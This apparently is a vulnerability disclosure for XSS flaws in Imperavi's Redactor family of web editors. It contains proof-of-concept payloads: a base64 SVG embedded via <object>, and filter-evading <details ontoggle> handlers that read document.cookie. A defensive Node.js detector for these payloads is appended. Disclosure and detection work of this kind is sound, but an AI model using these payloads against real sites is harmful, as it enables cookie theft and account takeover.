XSS Vulnerability of Redactor #78

@HxDDD

Description

Impact

  1. XSS in Redactor, Redactor X, Article, Revolvapp

Steps to reproduce

POC

Redactor

  1. Access the editor page: https://imperavi.com/redactor/
  2. Click "HTML code" and insert the XSS script
    script: ><object data="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxMCIgaGVpZ2h0PSIxMCIgaWQ9InhzcyI+PHNjcmlwdCB0eXBlPSJ0ZXh0L2VjbWFzY3JpcHQiPmFsZXJ0KDQ1KTs8L3NjcmlwdD48L3N2Zz4=">

[Screenshot 1]

  1. XSS

[Screenshot 2]

Redactor X, Article

  1. Access the editor pages: https://imperavi.com/redactorx/ and https://imperavi.com/article/
  2. Click "HTML code" and insert the XSS script
    script: <object data="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxMCIgaGVpZ2h0PSIxMCIgaWQ9InhzcyI+PHNjcmlwdCB0eXBlPSJ0ZXh0L2VjbWFzY3JpcHQiPmFsZXJ0KCdYU1MnKTs8L3NjcmlwdD48L3N2Zz4=">

[Screenshot 3]

  1. XSS

[Screenshot 4]

Revolvapp

  1. Access the editor page: https://imperavi.com/revolvapp/
  2. Click "HTML code" and insert the XSS script
    script: <details open ontoggle=alert(document.cookie)>xss</details> <dETAILS/open/onToGgle=a=prompt,a(document.cookie) x>

[Screenshot 5]

  1. XSS

[Screenshot 6]
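Added example, not code from the issue or from Imperavi's products: a server-side pre-check for HTML submitted through an editor's "HTML code" mode, written for Node.js (it uses the `Buffer` global). The two payload families in the report work for different reasons: the `<object>` payload loads an SVG document from a `data:` URL, and the SVG carries its own `<script>`; the `<details>` payload relies on the browser's tag tokenizer treating `/` like whitespace and attribute names case-insensitively, so `<dETAILS/open/onToGgle=...>` is a live event handler. The detector below normalises tags the same way, flags blocked elements, `on*` attributes and `data:`/`javascript:` URLs, and decodes markup nested inside `data:` URLs so the inner `<script>` is found. The element and attribute lists, the function names and the `depth` limit are this example's own choices; the sample inputs are the payloads quoted in the report.

```javascript
// Added example (not from the issue or Imperavi). Detector for editor HTML:
// walks start tags, normalises attribute syntax the way browsers do, and
// reports the constructs the reported payloads depend on. It is a reject-on-
// match check for a save endpoint, not a sanitizer; an allow-list sanitizer
// should still run before anything is rendered.

const BLOCKED_ELEMENTS = new Set(['script', 'object', 'embed', 'iframe', 'applet', 'base']);
// Attributes whose value is a URL, so the scheme matters.
const URL_ATTRIBUTES = new Set(['src', 'href', 'data', 'action', 'formaction', 'xlink:href', 'poster']);
// Elements where a data: URL loads navigable or active content (an inline PNG in <img> is fine).
const DATA_URL_SENSITIVE = new Set(['object', 'embed', 'iframe', 'a', 'form', 'script']);

// Split a start tag's attribute text into {name, value} pairs. Browsers treat "/"
// like whitespace here, which is why <dETAILS/open/onToGgle=...> is live markup.
function parseAttributes(raw) {
  const attrs = [];
  const re = /[\s/]*([^\s/=>]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/g;
  let m;
  while ((m = re.exec(raw)) !== null) {
    attrs.push({ name: m[1].toLowerCase(), value: m[2] ?? m[3] ?? m[4] ?? '' });
  }
  return attrs;
}

// Scheme of a URL after the normalisation browsers apply: ASCII controls and
// spaces are dropped and the scheme is compared case-insensitively.
function schemeOf(value) {
  const cleaned = value.replace(/[\u0000-\u0020]/g, '').toLowerCase();
  const m = /^([a-z][a-z0-9+.-]*):/.exec(cleaned);
  return m ? m[1] : null;
}

// Return the markup carried inside a data: URL (SVG, HTML or XML only), else null.
function decodeDataUrl(value) {
  const m = /^\s*data:([^,]*),([\s\S]*)$/i.exec(value);
  if (!m) return null;
  const meta = m[1].toLowerCase();
  if (!/svg|html|xml/.test(meta)) return null; // raster images and fonts cannot carry script
  try {
    return /;base64/.test(meta) ? Buffer.from(m[2], 'base64').toString('utf8') : decodeURIComponent(m[2]);
  } catch {
    return null;
  }
}

// Scan an HTML fragment and return findings. `depth` bounds recursion into nested data: URLs.
function scanHtml(html, depth = 0) {
  const findings = [];
  // Start tags only; quoted attribute values may contain ">" without ending the tag.
  const tagRe = /<([a-zA-Z][^\s/>]*)((?:"[^"]*"|'[^']*'|[^>"'])*)>/g;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const tag = m[1].toLowerCase();
    if (BLOCKED_ELEMENTS.has(tag)) findings.push({ kind: 'blocked-element', tag, depth });
    for (const { name, value } of parseAttributes(m[2])) {
      if (name.startsWith('on')) findings.push({ kind: 'event-handler', tag, attr: name, depth });
      if (!URL_ATTRIBUTES.has(name)) continue;
      const scheme = schemeOf(value);
      if (scheme === 'javascript') findings.push({ kind: 'javascript-url', tag, attr: name, depth });
      if (scheme === 'data') {
        if (DATA_URL_SENSITIVE.has(tag)) findings.push({ kind: 'data-url', tag, attr: name, depth });
        const nested = decodeDataUrl(value);
        if (nested !== null && depth < 3) findings.push(...scanHtml(nested, depth + 1));
      }
    }
  }
  return findings;
}

// Accept/reject decision a save endpoint could apply before storing editor HTML.
function isSafeToStore(html) {
  return scanHtml(html).length === 0;
}

// Sample inputs: the payloads quoted in the report above (Redactor X/Article and Revolvapp).
const REPORTED_PAYLOADS = {
  object: '<object data="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxMCIgaGVpZ2h0PSIxMCIgaWQ9InhzcyI+PHNjcmlwdCB0eXBlPSJ0ZXh0L2VjbWFzY3JpcHQiPmFsZXJ0KCdYU1MnKTs8L3NjcmlwdD48L3N2Zz4=">',
  details: '<details open ontoggle=alert(document.cookie)>xss</details> <dETAILS/open/onToGgle=a=prompt,a(document.cookie) x>',
};
```

For the `<object>` payload the scan reports the blocked `object` element, the `data:` URL on its `data` attribute and, after decoding, the `<script>` inside the SVG at depth 1; for the `<details>` payload it reports two `ontoggle` handlers, the second found despite the `/` separators and mixed case. A fragment such as a paragraph with an inline PNG `<img>` produces no findings. The regex tokenizer mirrors only the tag-level behaviour the payloads exploit; for rendering, pair this check with a proper allow-list HTML sanitizer rather than relying on the detector alone.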
